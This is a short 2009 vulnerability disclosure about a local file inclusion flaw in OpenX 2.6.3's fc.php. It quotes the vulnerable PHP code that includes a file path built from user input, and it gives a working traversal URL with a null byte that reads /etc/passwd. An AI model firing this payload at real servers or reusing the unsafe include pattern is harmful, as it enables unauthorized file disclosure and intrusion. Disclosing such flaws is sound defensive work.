OpenX 2.6.3 - Local File Inclusion

2009-01-28T00:00:00
ID SECURITYVULNS:DOC:21232
Type securityvulns
Reporter Securityvulns
Modified 2009-01-28T00:00:00

Description

I have found a local file inclusion exploit in OpenX 2.6.3, this is in the script "fc.php", located in /www/delivery/

Here is a snip of the code: [snip] include_once '../../init-delivery.php'; $MAX_PLUGINS_AD_PLUGIN_NAME = 'MAX_type'; if(!isset($_GET[$MAX_PLUGINS_AD_PLUGIN_NAME])) { echo $MAX_PLUGINS_AD_PLUGIN_NAME . ' is not specified'; exit(1); } $tagName = $_GET[$MAX_PLUGINS_AD_PLUGIN_NAME]; $tagFileName = MAX_PATH . '/plugins/invocationTags/'.$tagName.'/'.$tagName.'.delivery.php'; if(!file_exists($tagFileName)) { echo 'Invocation plugin delivery file "' . $tagFileName . '" doesn\'t exists'; exit(1); } include $tagFileName; [/snip]

As you can see, it is checking whether the file you have inputted exists. This can be exploited like so:

http://host/path/to/openx/www/delivery/fc.php??MAX_type=../../../../../../../../../../../../../../etc/passwd%00

Enjoy.

-Charlie [Elites0ft.com]